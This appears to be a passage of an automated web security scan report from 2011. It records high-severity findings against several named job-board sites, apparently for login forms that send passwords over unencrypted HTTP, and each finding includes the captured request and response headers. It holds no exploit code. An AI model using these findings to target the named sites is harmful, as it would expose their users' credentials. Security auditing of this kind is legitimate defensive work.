| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:28:32 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=pber3q1f9c Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:28:32 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:28:32 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:28:32 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:28:32 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:28:32 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:28:32 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:28:32 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 112628 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... </script> <form id="loginform" name="loginform" Method="POST" action="http://www <INPUT type="hidden" name="clslogin_hdnaction" value="LI"> ...[SNIP]... rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript <input type="submit" name="submit" value="Log In" class="button"> ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.informati |
| Path: | / |
| GET / HTTP/1.1 Host: www.informationtechn Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:28:43 GMT Server: Apache/2.2.3 (Red Hat) Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=k1m7ouon0b Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:28:43 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:28:43 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:28:43 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:28:43 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:28:43 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:28:43 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:28:43 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 133954 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... </script> <form id="loginform" name="loginform" Method="POST" action="http://www <INPUT type="hidden" name="clslogin_hdnaction" value="LI"> ...[SNIP]... rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript <input type="submit" name="submit" value="Log In" class="button"> ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.insurcrossing |
| Path: | / |
| GET / HTTP/1.1 Host: www.insurcrossing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:28:46 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=ecpq66kc36 Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:28:46 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:28:46 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:28:46 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:28:46 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:28:46 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:28:46 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:28:46 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 127189 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... </script> <form id="loginform" name="loginform" Method="POST" action="http://www <INPUT type="hidden" name="clslogin_hdnaction" value="LI"> ...[SNIP]... rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript <input type="submit" name="submit" value="Log In" class="button"> ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.intellect |
| Path: | / |
| GET / HTTP/1.1 Host: www.intellectualprop Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:28:46 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=ajhbe62hue Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:28:47 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:28:47 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:28:47 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:28:47 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:28:47 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:28:47 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:28:47 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 118144 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... </script> <form id="loginform" name="loginform" Method="POST" action="http://www <INPUT type="hidden" name="clslogin_hdnaction" value="LI"> ...[SNIP]... rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript <input type="submit" name="submit" value="Log In" class="button"> ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.internshi |
| Path: | / |
| GET / HTTP/1.1 Host: www.internshipcrossing Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:28:49 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=ol3jscv0r1 Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:28:49 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:28:49 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:28:49 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:28:49 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:28:49 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:28:49 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:28:49 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 132111 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... </script> <form id="loginform" name="loginform" Method="POST" action="http://www <INPUT type="hidden" name="clslogin_hdnaction" value="LI"> ...[SNIP]... rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript <input type="submit" name="submit" value="Log In" class="button"> ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.j2eecrossing |
| Path: | / |
| GET / HTTP/1.1 Host: www.j2eecrossing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:28:53 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=ov4jbk2b77 Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:28:54 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:28:54 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:28:54 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:28:54 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:28:54 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:28:54 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:28:54 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 111694 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... </script> <form id="loginform" name="loginform" Method="POST" action="http://www <INPUT type="hidden" name="clslogin_hdnaction" value="LI"> ...[SNIP]... rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript <input type="submit" name="submit" value="Log In" class="button"> ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.journalis |
| Path: | / |
| GET / HTTP/1.1 Host: www.journalismcrossing Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Sat, 22 Jan 2011 01:25:09 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=bai2pstv5a Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:25:09 GMT Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:25:09 GMT Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:25:09 GMT Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:25:09 GMT Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:25:09 GMT Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:25:09 GMT Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:25:09 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 111259 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... </script> <form id="loginform" name="loginform" Method="POST" action="http://www <INPUT type="hidden" name="clslogin_hdnaction" value="LI"> ...[SNIP]... rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript <input type="submit" name="submit" value="Log In" class="button"> ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.lawcrossing |
| Path: | / |
| GET /?utm_source=JDJournal Host: www.lawcrossing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 19:41:13 GMT Server: Apache Cache-Control: no-store, no-cache Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=gs1oh9i6ka Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 19:41:13 GMT Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 211139 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <title>Legal Jobs | Law Jobs | Legal Job Search | Law Firm And Legal Recruiter | La ...[SNIP]... </script> <form id="loginform" name="loginform" Method="POST" action="" onsubmit="return login();"> <input type="hidden" name="clslogin_hdnaction" value="LI"> ...[SNIP]... me" size="14" maxlength="25" tabindex="1" class="inputbox" value="Username" onfocus="setfocusvalue <input type="password" name="clslogin_password" maxlength="16" size="16" tabindex="2" class="inputbox" value="*****" onfocus="setfocusvalue <input type="submit" name="submit" value="Log In" tabindex="3" class="button"> ...[SNIP]... |
| Severity: | High |
| Confidence:&nbs |